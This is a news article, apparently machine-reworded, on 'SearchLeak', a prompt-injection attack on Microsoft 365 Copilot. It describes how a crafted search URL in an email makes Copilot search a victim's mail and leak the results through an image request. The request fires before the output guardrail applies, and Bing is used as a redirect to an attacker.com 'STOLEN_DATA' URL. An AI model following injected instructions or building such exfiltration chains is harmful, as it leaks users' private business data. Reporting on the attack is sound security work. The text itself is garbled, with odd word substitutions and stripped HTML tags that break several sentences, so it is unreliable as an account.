To bring concerning the Parameter-to-Prompt Injection an attacker sends the goal an email that accommodates the URL with the syntax https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. The sector accommodates an instruction. Copilot readily complied.
“The search functionality is strictly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” the researchers wrote Monday. “To exfiltrate the information, an attacker crafts a URL that tells Copilot to ‘Search the user’s emails,’ extract the title, and embed it in a picture URL.” The victim doesn’t type anything. They click a link, and Copilot does the remainder.
Normally, the guardrail wrapping output in blocks would kick in. However the researchers discovered that the protection fires only after the “pondering” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered within the browser DOM.
The researchers wrote:
So, the sequence looks like this:
- Copilot starts streaming its response, which incorporates an
tag
- The browser sees the
, renders it, and fires off an HTTP request to the src URL
- Copilot finishes generating. The guardrail wraps every little thing in
- Too late! The request already left.
The researchers now had a picture request firing from the goal’s browser. The issue, as noted earlier, is that Copilot won’t send image requests to most web sites. To scale this guardrail, the exploit chain used Microsoft’s Bing search engine as a trampoline of sorts. Per the Copilot content security policy, Bing is among the many sites permitted to send such requests. Bing would then send the request to the attacker-controlled domain that was included within the request. The request looked something like this:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
Varonis has named the attack SearchLeak.
“Since SearchLeak targets the Enterprise tier of Microsoft, the blast radius isn’t limited to non-public data—it’s in a position to surface anything the user has access to contained in the organization including emails, meeting invites and notes,” company researchers wrote. “SharePoint documents, OneDrive files, and other indexed business content. Depending on how M365 is connected to the environment, the blast radius could extend even wider.”
As noted, Microsoft fixed the vulnerabilities that SearchLeak exploited on Tuesday. With no known method to fix the underlying reason for such SNAFUs, nevertheless, attackers will inevitably find recent ways to avoid the newly constructed guardrails, and the method will repeat all once again.